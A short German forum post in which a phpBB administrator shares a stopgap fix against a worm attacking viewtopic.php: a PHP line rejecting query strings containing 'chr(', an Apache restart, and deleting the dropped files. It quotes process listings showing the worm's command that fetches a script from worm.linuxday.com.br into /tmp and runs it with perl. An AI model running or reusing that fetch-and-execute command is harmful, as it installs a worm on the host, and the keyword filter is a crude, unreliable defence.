Jetzt steht da übrigens ein Code:
also ::)
in die viewtopic.php folgende 2 zeilen eintragen:
if ( stristr(urldecode($_SERVER['QUERY_STRING']),'chr(') ) {
die ("Screw u hackers");
}
(gleich nach dem <?php )
- danach den apache stop - und wieder starten
vorher im tmp ordner die genannten files löschen
somit sollten sich via
ps aux |grep wwwrun nich mehr sowas hier finden lassen
wwwrun 5317 0.0 0.5 3188 1396 ? S 12:31 0:00 wget worm.linuxday.com.br -O /tmp/.linuxdayworm
wwwrun 5319 0.0 0.4 2700 1132 ? S 12:31 0:00 sh -c wget worm.linuxday.com.br -O /tmp/.linuxdayworm;perl /tmp/.linuxdayworm
mfg stefan
seit dieser änderung keine probleme mehr und in log files stehen noch immer die versuche die allerdings ohne folgen bleiben
